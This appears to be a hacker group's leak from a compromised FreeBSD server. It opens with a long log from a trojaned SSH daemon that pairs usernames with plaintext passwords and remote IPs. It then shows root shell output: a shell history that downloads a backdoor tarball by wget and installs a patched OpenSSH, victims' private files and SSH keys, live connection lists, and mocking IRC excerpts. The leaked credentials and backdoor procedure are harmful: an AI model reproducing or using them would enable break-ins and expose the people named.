HOOKIN: ioplex:I*!@ONLINE
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: chaos1:ma012th
HOOKIN: matt:zeda02
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: chaos1:ma012th
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKOUT: 189.14.205.42 junior:123
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKIN: ioplex:I*!@ONLINE
HOOKOUT: 98.192.246.70 cycle:t00L8
HOOKOUT: 98.192.246.70 smash:n1gwh0re
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKIN: ioplex:I*!@ONLINE
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKOUT: 189.14.205.42 junior:123
HOOKOUT: 189.14.205.42 junior:123
HOOKOUT: 98.192.246.70 smash:n1gwh0re
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKOUT: 89.46.100.252 cycle:t00l8
HOOKOUT: 89.46.100.252 cycle:t00L8
HOOKIN: chaos1:ma012th
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKIN: yaquis:closereply456
HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ // puma.makosolutions.com
HOOKOUT: 98.124.176.76 cyber:t00L8
HOOKOUT: 89.46.100.252 cyber:t00l8
HOOKOUT: 98.124.176.76 cycle:t00l8
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: chaos1:ma012th
HOOKIN: ioplex:I*!@ONLINE
HOOKOUT: 89.46.100.252 cycle:t00L8
HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ // puma.makosolutions.com
HOOKIN: chaos1:ma012th
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: kruapra:asls0923
HOOKIN: cmm:skylin3
HOOKIN: chaos1:ma012th
HOOKOUT: 89.46.100.252 cycle:t0L8
HOOKOUT: 89.46.100.252 cycle:t00L8
HOOKOUT: 89.46.100.252 cycle:t00L8
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: katsst:ch0w$ie
HOOKIN: yaquis:closereply456
HOOKIN: smash:n1gwh0re
HOOKIN: smash:n1gwh0re
HOOKIN: smash:n1gwh0re
HOOKIN: smash:n1gwh0re
HOOKIN: katsst:ch0w$ie
HOOKIN: yaquis:closereply456
HOOKIN: yaquis:closereply456
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
HOOKIN: katsst:ch0w$ie
HOOKIN: blkgraz:.Blind1.
HOOKIN: blkgraz:.Blind1.
HOOKIN: blkgraz:.Blind1.
HOOKIN: blkgraz:.Blind1.
HOOKOUT: 89.46.100.252 cycle:t00L8
[root@velocity:/var/run]#

// 0wn3d by y0ur 0wn backd00r.. 


[root@velocity:~]# cat /etc/profile 
# $FreeBSD: src/etc/profile,v 1.14 2004/06/06 11:46:27 schweikh Exp $
#
# System-wide .profile file for sh(1).
#
# Uncomment this to give you the default 4.2 behavior, where disk
# information is shown in K-Blocks
# BLOCKSIZE=K; export BLOCKSIZE
#
# For the setting of languages and character sets please see
# login.conf(5) and in particular the charset and lang options.
# For full locales list check /usr/share/locale/*
# You should also read the setlocale(3) man page for information
# on how to achieve more precise control of locale settings.
#
# Read system messages
# msgs -f
# Allow terminal messages
# mesg y
export PS1="[\u@\h:\w]\\$ "
alias ls='/bin/ls -GFa'
alias ll='/bin/ls -GFal'
alias lo='/bin/ls -GFalo'
export LSCOLORS=ExGxFxf5CxfgDxabagacad
export EDITOR=pico
TMOUT=1800

export HISTFILE=~/.bshrc // Bypassing backdoor HISTFILE=/dev/null
export HISTSIZE=1500   

[root@velocity:~]# 

// After a while... 

[root@velocity:~]# cat /root/.bshrc 
w
rm -rf hax
rm -rf lol.tar.gz
ls -la
exit
w
wget http://board.whois.co.kr/lol.tar.gz // See attachments section for lol.tar.gz backdoor
tar -zxf lol.tar.gz
cd hax 
ls -la 
ssh -v 
vi version.h // OpenSSH Version editing
./quick // Installation
cd .. 
ls -la
cd /home/romeo/
ls -la
cat  .bash_history
ls -la
cd .irssi/
ls -la
rm -rf away.log // Too late..
cd ..
ls -la
w
ps aux | grep ssh
netstat -an | grep :22 // See the remaining 18 netstats.. not counting who and kills.. 
netstat -an | grep 22
netstat -an | grep ssh
netstat -a | grep 22
netstat -an | grep .22
env
netstat -an | grep 188.51.85.13
netstat -an | grep 248.22
w
netstat -anp | grep 248.22
netstat -an | grep 248.22
whois 98.242.244.25
ps aux | grep ssh
kill -9 8095
kill -9 8128
kill -9 8866
ps aux | grep ssh
kill -9 92546
kill -9 93418
w
env
netstat -an | grep 188.51.85.13
netstat -an | grep .248.22
w
ls -al
cat > w
sh x
sh w
ls -la
bas w
bash w
ls -la
cat w
netstat -tanp 
ps aux | grep ssh
kill -9 43929
kill -9 75936
kill -9 75934
ps aux | grep ssh
kll -9 23783
kill -9 23783
ps aux | grep ssh
time
date
ls -la
chmod +x w
./w
ls -la
rm -f w
ps aux | grep ssh
kill -9 22353
 ps aux | grep ssh
kill -9 9078
 ps aux | grep ssh
env
netstat -an | grep 188.51.85.13
netstat -an | grep .248.22
csf
last | grep 98.242.244.25
lastlog
w
ls -la
netstat -anp tcp
netstat -anp tcp | grep .22
netstat -anp tcp | grep 72.20.28.226.6697
netstat -anp
netstat -anp tcp
sockstat
ps aux | grep ioplex
exit
w
cd ~pimpinjg/
ls -la
cat .bash_history
w
ls -la
cd /
ls -la
cd /tmp
ls -la
cd /var/log
ls -la
tail -f messages
cat security | grep romeo
cat security | grep root
w
cd ~romeo
ls -la
cat  .bash_history
ps aux | grep romeo
ps aux | grep romeo
ps aux | grep ssh
w
ls -la
w
ls -la
ps aux
ps aux | grep irc
ping velocity.vitalspeeds.com
[root@velocity:~]# 

/* 
RoMe0 in panic mode.. netstat.. netstat.. netstat.. 
Thank you for all the fish.. n00bfish..
*/

[root@velocity:~]# cat /usr/home/pimpinjg/.bshrc 
nano .bashrc
clear
ls
grep -r motd
grep -r motd *
clear
rm -rf znc*
clear
ls
clear
PS1='\033[1;32m\]\033[1;30m\][\033[1;32m\]root\[\033[1;30m\]@\[\033[1;32m\]\h\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] '
clear
uptime
ps aux
ls -al
uptime
clear
ls
nano .profile
nano .bashprompt
exit
clear
screen -r
clear
exit
clear
screen -r
screen -r
clear
exit
[root@velocity:~]# 

// Advanced Linux Administration Skillz.. The 2 years of extensive training finally paid off.. 


[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/known_hosts
localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
72.20.28.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
189.14.205.42 ssh-dss AAAAB3NzaC1kc3MAAACBAJgf4VlHspyNWVtAQpi0Lsf78P5bted4NBEAk0MX6w0DNnomC1/kiqOa2pNeZSB05NT42z8+Pxc2a5JwNRolfbpRXPMvMvHYwDMsZAYerz6KOc04nwVskMLBP47bBV6IMbJf2DV7OMBuZI4Li7QfAyW/qJpwUnctChFjSscyv+srAAAAFQDiHNMyrvXk8AJkeKusaJ9vUGdtJwAAAIBr1lDX9MHqMpoeZFE3vX6VbrPfBqK5Zm0EgdSf9QdbGFVD5YcLQhyc88jsrR2sCUBNmQN9hV8o7NedqAFQK1RKToN7ZvrzuFNcOT+yO6/B1Z2WniNojmrbd7/27dJCQz02yXl96f1pFUUcU7gRMdgI9WngNqOE8ZMl3B/jw/MwuAAAAIAoMJDeUlKhowiywrlFC511AfRe+5KfhqK2ohhKne1yr4r5fBrVeTsZeN39qeu23dUOTc7xXP47Iu7STxF7vX6Jw29OWx9vytwbCGNHPMr1kTgRr9n+lHutOZmCqvag2rALA8gs+KUfYrwdUs1p7PDVuTO8bk4HRSPs9wCQnlmpOg==

[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAn6d6bVIeir4IWs3b8F8kUfiaHKXZ+4nwuQpRMaoI67rqY8Tmjp5oFgT7CeRCIF0GUXAjY3my4T3GcV0ed+/5ilyoC0NG5W/TAvF62IQpQop9apP8HBlyiOaHuXgNVbit6/1EUW4SvLWdUe8zNqTWPw0/qZ2eQAEH8E+cbqT8LYsNWsQI9tpcJykigRZF1TqjL6vJtbQLqSgr2Gdz1+Xv9wXKlxdHSLa5ay5VuEij6w6rUS7ZI9OoOqGA2NICjs008cOy3yhCVHh1V7I50rLoPZWBZa72VBPPMvqiJpHbcIP8+NaXnIeLoINnYsV3xk27lSDT0UBBHLQ5miaLnvEzgw== pimpinjg@mercedes.pimpinjg.ch


[root@velocity:/var/run]# lsof -i -n | grep ssh
sshd      19971       root    3u  IPv6 0xcc1771d0      0t0  TCP *:ssh (LISTEN)
sshd      19971       root    4u  IPv4 0xc585e000      0t0  TCP *:ssh (LISTEN)

sshd      23362       root    3u  IPv4 0xca6ae570      0t0  TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED) 
sshd      23383      romeo    3u  IPv4 0xca6ae570      0t0  TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED) 

sshd      28333       root    3u  IPv4 0xc9fc4570      0t0  TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
sshd      28335     yaquis    3u  IPv4 0xc9fc4570      0t0  TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
sshd      30593       root    3u  IPv4 0xc97b93a0      0t0  TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
sshd      30595     katsst    3u  IPv4 0xc97b93a0      0t0  TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
sshd      30595     katsst   10u  IPv4 0xc5b901d0      0t0  TCP 72.20.3.98:63271->192.168.1.1:http (SYN_SENT)
sshd      30595     katsst   11u  IPv4 0xc590eae0      0t0  TCP 72.20.3.98:60359->91.184.73.195:46464 (ESTABLISHED)
sshd      30595     katsst   12u  IPv4 0xc94fc570      0t0  TCP 72.20.3.98:61645->79.66.132.125:44020 (ESTABLISHED)
sshd      30595     katsst   13u  IPv4 0xc5eb2910      0t0  TCP 72.20.3.98:62162->192.168.1.1:http (SYN_SENT)
sshd      30595     katsst   14u  IPv4 0xc996d000      0t0  TCP 127.0.0.1:58269->127.0.0.1:33282 (SYN_SENT)
sshd      30595     katsst   15u  IPv4 0xc954e910      0t0  TCP 72.20.3.98:60168->72.185.123.4:6601 (ESTABLISHED)
sshd      30595     katsst   17u  IPv4 0xc99f81d0      0t0  TCP 72.20.3.98:60170->66.245.139.243:53066 (ESTABLISHED)
sshd      30595     katsst   18u  IPv4 0xca0c1570      0t0  TCP 72.20.3.98:60172->124.168.34.236:50666 (ESTABLISHED)
sshd      30595     katsst   19u  IPv4 0xcaf02910      0t0  TCP 72.20.3.98:60173->130.212.54.5:28573 (ESTABLISHED)
sshd      30595     katsst   22u  IPv4 0xc9dd9740      0t0  TCP 72.20.3.98:60180->173.22.219.92:64415 (ESTABLISHED)
sshd      30595     katsst   23u  IPv4 0xc622c570      0t0  TCP 72.20.3.98:60178->173.54.28.183:22677 (ESTABLISHED)
sshd      30595     katsst   27u  IPv4 0xca10bcb0      0t0  TCP 72.20.3.98:60183->79.101.217.199:55824 (ESTABLISHED)
sshd      30595     katsst   28u  IPv4 0xcc5021d0      0t0  TCP 72.20.3.98:60188->92.72.182.81:50009 (ESTABLISHED)
sshd      30595     katsst   29u  IPv4 0xcc3dd740      0t0  TCP 72.20.3.98:60189->65.26.34.13:23928 (ESTABLISHED)
sshd      30595     katsst   30u  IPv4 0xc972b740      0t0  TCP 72.20.3.98:60190->87.80.43.167:49878 (ESTABLISHED)
sshd      30595     katsst   35u  IPv4 0xca1413a0      0t0  TCP 72.20.3.98:60195->61.229.122.218:42282 (ESTABLISHED)
sshd      30595     katsst   38u  IPv4 0xc61be910      0t0  TCP 72.20.3.98:60198->67.185.180.151:21366 (ESTABLISHED)
sshd      30595     katsst   42u  IPv4 0xca1cb1d0      0t0  TCP 72.20.3.98:60202->81.246.198.243:21771 (ESTABLISHED)
sshd      30595     katsst   43u  IPv4 0xc9db61d0      0t0  TCP 72.20.3.98:60203->71.228.40.165:13289 (ESTABLISHED)
sshd      30595     katsst   46u  IPv4 0xc61bd3a0      0t0  TCP 72.20.3.98:60217->70.69.35.95:48486 (ESTABLISHED)
sshd      30595     katsst   49u  IPv4 0xc92c6000      0t0  TCP 72.20.3.98:60224->24.245.45.179:56678 (ESTABLISHED)
sshd      30595     katsst   52u  IPv4 0xcae45740      0t0  TCP 72.20.3.98:60229->66.41.52.92:26396 (ESTABLISHED)
sshd      30595     katsst   56u  IPv4 0xca03d740      0t0  TCP 72.20.3.98:60258->122.167.178.174:29404 (ESTABLISHED)
sshd      30595     katsst   82u  IPv4 0xc9dbacb0      0t0  TCP 72.20.3.98:60295->77.250.210.43:62003 (ESTABLISHED)
sshd      30595     katsst   85u  IPv4 0xca0793a0      0t0  TCP 72.20.3.98:60311->93.97.7.183:38461 (ESTABLISHED)
sshd      30595     katsst   86u  IPv4 0xc9a1c000      0t0  TCP 72.20.3.98:60307->65.33.173.202:24132 (ESTABLISHED)
sshd      30595     katsst   87u  IPv4 0xc986f910      0t0  TCP 72.20.3.98:60312->74.173.228.216:61577 (ESTABLISHED)
sshd      30622       root    3u  IPv4 0xc98fb000      0t0  TCP 72.20.28.205:ssh->89.30.147.8:3766 (ESTABLISHED)
sshd      30890       root    3u  IPv4 0xc58eb000      0t0  TCP 72.20.28.205:ssh->89.30.147.8:3812 (ESTABLISHED)
[root@velocity:/var/run]# 

ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZ	[root@velocity:/]# ps -aux | grep romeo									      ANTISECFORLULZ
ANTISECFORLULZ	root       98610  0.0  0.2  5400  2004  ??  Is   12:16PM   0:00.19 sshd: romeo [priv] (sshd)		      ANTISECFORLULZ
ANTISECFORLULZ	romeo      98648  0.0  0.2  5384  2052  ??  S    12:16PM   0:03.21 sshd:  (sshd)			      ANTISECFORLULZ
ANTISECFORLULZ	romeo      27874  0.0  0.6  9104  6212  p0  S+    2:21PM   0:04.59 irssi -h absolute.ownage.net		      ANTISECFORLULZ
ANTISECFORLULZ	romeo      32521  0.0  0.1  3272  1384  p0  Is    7:40PM   0:00.05 /usr/local/bin/bash                        ANTISECFORLULZ
ANTISECFORLULZ	romeo      27845  0.0  0.1  2040  1376  p2  S+    2:20PM   0:00.04 screen -r				      ANTISECFORLULZ
ANTISECFORLULZ	romeo      98652  0.0  0.2  3244  1848  p2  Is   12:16PM   0:00.03 -bash (bash)				      ANTISECFORLULZ
ANTISECFORLULZ	root       32868  0.0  0.1  1552   872  p3  L+    4:23PM   0:00.00 grep romeo				      ANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZ	[root@velocity:/]# killall screen									      ANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZ	[00:25:59] * Quits: @pimpinjg (FBI@tdirc-1243C38A.deploy.akamaitechnologies.com) (Quit: Lost terminal)	      ANTISECFORLULZ
ANTISECFORLULZ	[00:25:59] * Quits: &RoMeO (root@DarkMindZ.com) (Quit: Lost terminal)					      ANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZ	[12:29am] <~RoMeO> wtf is up with screen :@ 								      ANTISECFORLULZ
ANTISECFORLULZ	[12:29am] <+G-Brain> 23:26 -!- RoMeO [root@DarkMindZ.com] has quit [Quit: Lost terminal]		      ANTISECFORLULZ
ANTISECFORLULZ	[12:30am] <~RoMeO> "[screen is terminating]" with no reason						      ANTISECFORLULZ
ANTISECFORLULZ	[12:30am] <+G-Brain> hah										      ANTISECFORLULZ
ANTISECFORLULZ	[12:30am] <%p3ri0d> oh yeah										      ANTISECFORLULZ
ANTISECFORLULZ	[12:30am] <+G-Brain> it has a few shitty default key bindings						      ANTISECFORLULZ
ANTISECFORLULZ	[12:30am] <~RoMeO> ctrl+D										      ANTISECFORLULZ
ANTISECFORLULZ	[12:30am] <~RoMeO> didnt do that									      ANTISECFORLULZ
ANTISECFORLULZ	[12:33am] <~RoMeO> gay shit										      ANTISECFORLULZ
ANTISECFORLULZ	[12:33am] <+G-Brain> [romeo@juliet]$ pkill -9 screen							      ANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZ														      ANTISECFORLULZ
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ

[root@velocity:/]# last | grep romeo
romeo            ttyp3    188.50.84.224    Thu Jul  2 23:06 - 00:24  (01:17)
romeo            ttyp0    188.50.84.224    Thu Jul  2 22:53 - 01:52  (02:58)
romeo            ttyp6    188.51.85.13     Thu Jul  2 14:49 - 17:59  (03:09)
romeo            ttyp5    188.51.85.13     Thu Jul  2 12:12   still logged in
romeo            ttyp5    188.51.85.13     Thu Jul  2 11:02 - 11:05  (00:02)
romeo            ttyp5    188.51.85.13     Wed Jul  1 20:29 - 20:29  (00:00)

[root@velocity:/]# cat ~/ssh/known_hosts 
light.co1.org ssh-dss AAAAB3NzaC1kc3MAAACBAN3XmImvEAnfEUs2QzYWuj7LVVNVNwPuIDfO9Wb+aSWWRwD28hXbfVSw3llyo+p8aERrCn5FcbVHodgmt7IuEER9roB6AoiH664XsQwIviSx/2mvMrvXVGYmdvtSINnwNH389DS2/chf2gsBz772tTNT2c8myM4drZ2ArkeNP81JAAAAFQDAt8OXB+nbsHkfxhYZzUtY5DWIcwAAAIEAoUvbQneoUMbzYNF71L7/6vQxcV9rnYSAOs7NBB3aH61NG+gYgSh0FL0Ctv2PcqFsjRLE7UK/mcl1Dvq5K87CGfcH4LDCiuI0zB9lWZfWbuN5axCllFczboa4ED5VkPfjEJDmKQbbSvVlQE9TTa3QPY8bxQmcDJ5e4nKcq2s0zbMAAACAPSrhPRr4kNipRtQMAztneiqaixSr6w/8CnXIINAMf/9xWqmg0ZWnsgOpY5t30m6BEEPZL/mjspAXnY5AKS6ZcIOzq5zFnw3Gvgz4E/X5uDvR2TUaEBFQI8noDyzMBH2KTcj2ipuEYr5SKYEtgBB8zCMXuJ2ufDBb0H9tjIJnf8M=
zelda.vitalspeeds.com ssh-dss AAAAB3NzaC1kc3MAAAEBAKPbekcqfiUr+bg1wPxVWTYqnanbeckqLRM7N7g/24kGTi5ITtv4mbbWZrcdlkKOn0pjjpD4/cZ9NOZ5L9kn3+TOb4oozTB4zFbQKqNvQAr7/iw8eR72bdoRyzNCDLZpkM/4nMoMNclyZuUulYf7PHqqqiMVdcPNvis78GteI6uajJEQlIPiLB2oaFWrBvcGmbaBC4iKihvprcJJ+9dsKVlbXVBR6kkjagvr+jkhDxYQ5cWtwy+0+7/tiogvinuTUNdgxyociCv26aLBdwTQuluiJhYSWLR2HnV2qxnNRoqzoIQY8gxLBHDNh58k7puc9KMIE0D9XNDfkf6cSQeQpIMAAAAVAOqStUQquE8fqirTa8WxVJbo99i5AAABAHh+6hGu61iPvGQ20dw3+8+O0rc94famvy9gO2+8USsT4/pyqKVdPtXjZVcwSMVpcO+9Oj4fQSs+KRxmb3pfCmY0sdUpsuSiCaBDxKj7M45C+m9LzgytZi5iaesnOxipp0NS+xgvDJ1fqOj3hmLYl89wo6CCHBZhHo4jJ1/FzBmIXQZJOAsek61DOzkKzSdm8zZDZQEcP/DjNd9tLWWomDvOLZ0kwoUqlF08vxKU19wnMgvFyKUbE8bWq02/gE1dOwZ7IsemosVlVj1ogw/L/J2NeEnESnoYFSBKdKDmRqSvFmgtRGKxhGGjvw63054g+9UzJxOXdVHymqktH9aGQ+MAAAEAdJuQ46uo8jolkRk0hD3zoBweKjZWacEe7OkSw1jxk8LoGV3VjDMqAvf4xcPUje7l6tKeyrdoR1u7LcweDobqn5d8Ok1Ui0zZIf0hQQBGE5ecKNDEE7AOrbc7kBNNInRxgTnkGu87+k6d05tWHyHlXIZTEceblYZ2iM8ZSpKViTO2lL3nq7JwA3sSHX2pcJ0ED5vlw2KtafbXs+8VFga9s1+DJIvF/TrUasW/3Hlt+13/4EHp8H7fJZzEN1SUj8JfGuoLu4rsceCkBYwxPW/zidGxrgkgGZXePnN7Hnttzx8KFFuJRIrIIMiCJFEWcKMBc1+knCgF9iON2h7g0KSACQ==
72.20.18.193 ssh-dss AAAAB3NzaC1kc3MAAACBAKnwL2xkqjelqTjnJT2ZGFEa9xRUpmdVdx0WSc3SAuDBnFmIv3JLOWsUwTzAtbvs8oRc6HTqrhardxR/C5Xym2dxvnYU7cjKxZHSuH3u9lchW1HS6OWr63fPdLXDDU1LWkvPVGCHzZKw1sZti/3LFMW6HWZDgsMyAQ/q+LeD/E2rAAAAFQD/Ftrlj6cfUu6ItwNJ7loaosdwuwAAAIBwuBVkHiiibruCbl6EwrbrZ/YA80HIS6xgVYK3AoAckXoClY2j8xAkRC4EirwsruTyGNK2BexAXx4E7JAkDvDs9hs8EfSo3TixtXuiBQVUSBpVm/P3425MbDioqQtYm1Q8GFP60vdq8DI3nTXvP+4y/KpDPiuwVX8ifyg9gML3+wAAAIBlRfTV+UdJNa2rN5j4EDHiI0xzuv1NEDIDKKH1XJqBZpdAyyqc+mYkLPcFn/3/T8Cw47G24Umou/lh+XK4PCUIXsUEwc3xGjENwRf62AXpvadEjzoUiyMQ5LEnEUyRBxBWTZtqOJE7EGL97kEDg+WnPd0X5qso9BDjP+LaT+Bqnw==
72.20.18.144 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYfv1zRyKyjF625A/39tr/lYfiIxeUcA0zrZFCBGD5Na+6BgKMWkTk9UxoIVc7H0hUsmkIejnjEFjjS8Jatao4VKCMXHkfPoVQnhp7bAmHc5ZwgBdAi+ENhN+acKhx3JnRy11q/wviOd2QVkoJQXfqc2zKCLC5LDlDOn2Pjbz3/cU6nOPNub1t2cxzXGZ3ez57uGstob7iXz1xFELB2oskr/Ews0WjmN0HPYSwfL/LntpA5ciBUp2L04pPrJRyH+nYPbUn09j/rmN/d9FxVyzKE7PSeVXRybE6DXZoPG00pTU7gVeb4sMjnCJbo8e8TUHrD3roaoADJK9KGYxfUBSw==
88.196.163.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4wjPA3bTL9ZvD137cH5sn8QnvuyMiZN13SF1gnojBAVC2EA1xO0F9okHLukDL+gTEOpbN+JA0W4rMrzAe58+dhSBpSSJlGnNwb14jLEp6GxYDn31+SRns8RWgprq7b/AD7aBUimlE2ExB9I57HIm31XVfO5QsMlg9EW2//4E6vU=
ntora.eml.ee,194.204.32.101 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzoxPtx6AsAOJ+ZZmvtHHBWDi+mH9meDP24M9FPpxAn7lmoXDFlftNURU83/LjTMcym+jsbPVFMC3w6HrRyQQ8v8GFJVR9z/hfKFlUzEUEO7TX1UK39Mswo90wbTwhOpwD3/XkP6YsPZQwN+EN5x37oH9PCXs9KxVCAju0alSrw0=
72.20.18.145 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYfv1zRyKyjF625A/39tr/lYfiIxeUcA0zrZFCBGD5Na+6BgKMWkTk9UxoIVc7H0hUsmkIejnjEFjjS8Jatao4VKCMXHkfPoVQnhp7bAmHc5ZwgBdAi+ENhN+acKhx3JnRy11q/wviOd2QVkoJQXfqc2zKCLC5LDlDOn2Pjbz3/cU6nOPNub1t2cxzXGZ3ez57uGstob7iXz1xFELB2oskr/Ews0WjmN0HPYSwfL/LntpA5ciBUp2L04pPrJRyH+nYPbUn09j/rmN/d9FxVyzKE7PSeVXRybE6DXZoPG00pTU7gVeb4sMjnCJbo8e8TUHrD3roaoADJK9KGYxfUBSw==
localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
corp.efnet.net,66.63.177.130 ssh-dss AAAAB3NzaC1kc3MAAACBAIEGPI/+Mc3k8MLPbka2tHwx3R61Cg8Vm1R7tvlS7GJuGLUVAfMsEVGKkS/YMLFMoEoAi+vbKAi26YAW82BzJqGSeGNBtEYw6Xs0I6GrWmNKIQQZUEC/M2krMWaTw1ABCIS7K9DGWZFDclWIN73fBKzaWpUyT7X1aLjIBMR9b6nTAAAAFQCAUudmdw3AlJAzG4L5e0tOgHECRwAAAIBTHFmZBp8xyujK0irLERfUFGSMxrqtq4TqpZL0n6Zp/PgsG/TaGgc/B7XLxya3GkzDNnXUO3CtQe/rv5bM+68MwSO+8iFnYid2vinu6C5R1dTAKD9QYKR74U5naARdUnUtOmUVKRPHD9kOlJJuyWYjSCLbxnERzCB8/YHbkvcuYAAAAIAYsHYvOIIDzv7QWN/trtJbYbCAwaKDu0UB/bKN0iMJxxHTRRRfw8TxQ+y9YsfcFPcsMxwKUp+9+q7zjyi6dQ9FLfmMk3TiBiVGZgC20LE5K1TTMYERptzWCI4Ic6HiYAAHEnNxEb0jLmdGMnyWGq89h7AGcGLWPkj4zDn9MMgjmw==
72.20.28.202 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
98.124.176.76 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq20pbQHr81GL9ny66Z9uzGPPmk3dV8P8QgyBi/tHze21Fx30Uh0z7iq8jw0C+Qc+CZdgtIZBSqZrwyEH9m4mORGyST44c2eTH8Bpao++YIWXxu3qPN7L4idVwKfaWygLB4Xo1fJspA1P6NR6WEuJAS3Xtzs8pEo5MPlFQeS/VFv6SPYqURviwJIAGxt/nHDMRGvteQP2/k+m/jCWZy2bP1tbuPMxYqODoesqqtmyAnhjIIWzXtACA6Y7wJCXwSDdgsXYilzdunChYCtoodsad2zrxaR+bi3RQ7xWBAZu8zEfFxbOMDJiFQedWA9mzg4KR0Nn9DZDvXt/jPO/lqOPPQ==
